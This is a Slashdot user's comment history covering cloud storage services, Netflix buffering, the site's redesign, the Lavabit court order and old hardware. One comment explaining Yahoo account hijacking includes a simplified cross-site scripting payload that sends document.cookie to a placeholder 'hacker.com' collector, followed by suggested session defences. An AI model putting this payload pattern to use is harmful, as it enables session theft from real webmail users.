Please create an account to participate in the Slashdot moderation system

 


Forgot your password?
Close
typodupeerror
×

Comment Alternatives (Score 1) 330

by jest3r (#50858081) Attached to: Microsoft Cuts OneDrive Storage Limits, Citing Abuse
I posted this back when Wuala shut down. Seems relevant again just a few months later.

I've been using Sync.com for the past year. They've been sort of in beta but releasing features. 5GB free.

SpiderOak is decent but they recently dropped their free plan, so not sure what's going on there.

MEGA was great but Kim.com said last week in Wired that the company is run by criminals

Tresorit is good but expensive. Maybe that's why they've been around so long.
Bitcasa pulled a Wuala last year and closed down their consumer cloud storage after a lawsuit. That's pretty much it.
There's OwnCloud which is do it yourself. And BitTorrent Sync which is kind of do it yourself but they've been adjusting pricing so it's bait and switch as well.

Submission + - Microsoft kills unlimited OneDrive storage, downgrades other plans, claims abuse (betanews.com)

Submitted by BrianFagioli
BrianFagioli writes: Unfortunately, the company has just made a major faux pas, by announcing it will be downgrading OneDrive storage plans, including canceling its 'unlimited' offering. Why would it do such a terrible thing to its users? The company claims that some abusive users have ruined it for everyone. Has Microsoft just entered into a PR nightmare?

Comment Re:Do over please (Score 4, Insightful) 73

by jest3r (#50586345) Attached to: Imgur Exploited To Channel Botnet Attacks At 4chan
I think I read that Imgur was inlining images with data urls when viewing the raw image.

So if you visited www.imgur.com/image.jpg the source code would look like:
img src="data:image/jpg;base64,R0lGODlhEALMAAOazToeHh0tLS/7LZv/0jvb2 ...... etc.

When uploading an image to Imgur someone figured out how to append code to the end of the raw data to break out of the data url data and append some Javascript to it.

The Javascript pulled down images from 8chan among other things.

Comment Alternative Encrypted Cloud Storage Providers (Score 4, Informative) 128

by jest3r (#50336303) Attached to: Wuala Encrypted Cloud-Storage Service Shuts Down
I've been using Sync.com for the past year. They've been sort of in beta but releasing features. 5GB free.

SpiderOak is decent but they recently dropped their free plan, so not sure what's going on there.

MEGA was great but Kim.com said last week in Wired that the company is run by criminals

Tresorit is good but expensive. Maybe that's why they've been around so long.
Bitcasa pulled a Wuala last year and closed down their consumer cloud storage after a lawsuit. That's pretty much it. There's OwnCloud which is do it yourself. And BitTorrent Sync which is kind of do it yourself but they've been adjusting pricing so it's bait and switch as well.

Comment Re:Can confirm (Score 1) 289

by jest3r (#46306613) Attached to: ISP Fights Causing Netflix Packet Drops
Same here. For the past week or two I have been experiencing all sorts of glitches, stoppages and buffering through Netflix. My local ISP on demand service is fine though. Before last week everything was awesome!

Called my ISP about it - they said contact Netflix.

Maybe Netflix should add net neutrality to the House of Cards story arc to get the word out???

Comment death of a "brand" (Score 5, Insightful) 2219

by jest3r (#46180687) Attached to: Slashdot Tries Something New; Audience Responds!
Please consider the following branding points:
  • Why did you make the logo smaller but increase the overall height of the top navbar? (now you have more wasted space up there for what?)
  • Why did you change the "Slashdot Green" colour? We all like the current green (the new green appears washed out).
  • Why are the Icons no longer beside the story titles? (the icons have always been a big part of the Slashdot "brand" and help with readability.)
  • Why did you remove the "Slashdot Green" title bars on all the stories? The title bars are also a big part of the Slashdot "brand" and also help with readability by clearly dividing the stories and providing an easy to see visual cue that delineates the new stories and even the comment threads.
  • Why did you remove the tags and/or make them boring? The tags added some dry humour to the stories (eg. whatcouldpossiblygowrong) which while subtle, was also a part of the Slashdot experience. Little unique details make a difference. Now the tags seem to be gone or just generic boring categorizations.
  • Why are you cutting off the Summary on the Homepage View? (reading the full summary without having to click anything is imperative to ensuring the website is readable.)

  • Why did you remove the Slashdot Green Title Bars from the comment threads? (the green title bars create an easy to see delineation between the comments and are easy to see even when scrolling fast. (they are also part of that Slashdot Brand I was talking about)

  • Why is there so much more padding and spacing between everything? Why are the font sizes so much larger? Did your user base suddenly become senior citizens?

Over the past decade the Slashdot logo, the Slashdot green, the title bars and icons, unique details and config options have become part and parcel of the "Slashdot Brand". It's what makes Slashdot unique. By ignoring this you weaken your brand and your reader's loyalty. You are basically stripping away all that is Slashdot without adding anything useful or new!!!!

Submission + - Lavabit Case Unsealed: FBI Demands Companies Secretly Turn Over Crypto Keys (wired.com)

Submitted by jest3r
jest3r writes: Lavabit won a victory in court and were able to get the secret court order unsealed. The ACLU's Chris Soghoian called it the nuclear option. The court order revealed the FBI demanded Lavabit turn over their root SSL certificate, something that would allow them to monitor the traffic of every user of the service.

Lavabit offered an alternative method to tap into the single user in question but the FBI wasn't interested.

Lavabit could either comply or shut down. As such no US company that relies on SSL encryption can be trusted with sensitive data. Everything from Google to Facebook to Skype to your bank account is only encrypted by SSL keys, and if the FBI can force Lavabit to hand over their SSL key or face shutdown they can do it to anyone.

Comment Re:Ahh, Pentium. (Score 1) 197

by jest3r (#43249395) Attached to: Intel's Pentium Chip Turns 20 Today
Those were the good 'ole days. My CPU path was something like this:

486 DX2/66 -> Pentium Overdrive -> Pentium 200 -> Pentium Celeron 300A (over clocked to 450) ......

Video cards went something like:

Matrox Millenium -> Diamond Monster 3D -> 3DFX Voodoo II x 2 ......

Comment Re:Not a new exploit (Score 2) 50

by jest3r (#43246857) Attached to: Twitter, Hotmail, LinkedIn, Yahoo Open To Hijacking
All the hacker has to do is embed a link or image into an email and send that email to the Yahoo account of the victim. The victim then logs in and clicks the link or views the images. Assuming Yahoo doesn't filter out he embedded code the hackers gets the victim's cookies.

Simplified example:
Embedded image src in email: http://www.hacker.com/cookieparser.php?default=<script>alert(document.cookie)</script>

Obviously more complicated because you need to mask your embedded code to get through the filters but that is the basis of the XSS hack that has been hitting Yahoo all year ...

And because the sessions on the server never expire the hacker can gain access. I'm not sure how https would help in this scenario.

- Basically you need to pass a salted, hashed version of the session ID or random string (as a hidden form field) on all page views or form submissions and check that against both the session cookie and the hidden form field to make sure the cookie is coming from the original source (since there would be no way for the hacker to get that string as well). And invalidate the session if it doesn't match up. Also expire and delete the sessions after 6 hours of inactivity would help as well.

Comment Re:IANAL: DMCA and Trademark Infringement (Score 1) 232

by jest3r (#43240957) Attached to: GoPro Issues DMCA Takedown Over Negative Review

If you own a Review Website ... time to move the hosting outside of the USA.

Why does the hosting provider have to get involved anyways? Isn't the content of the website the responsibility of the domain owner? Someone please explain why the hosting company would have shut the entire website down if they didn't remove the page?

Slashdot Top Deals

"It's the best thing since professional golfers on 'ludes." -- Rick Obidiah

Close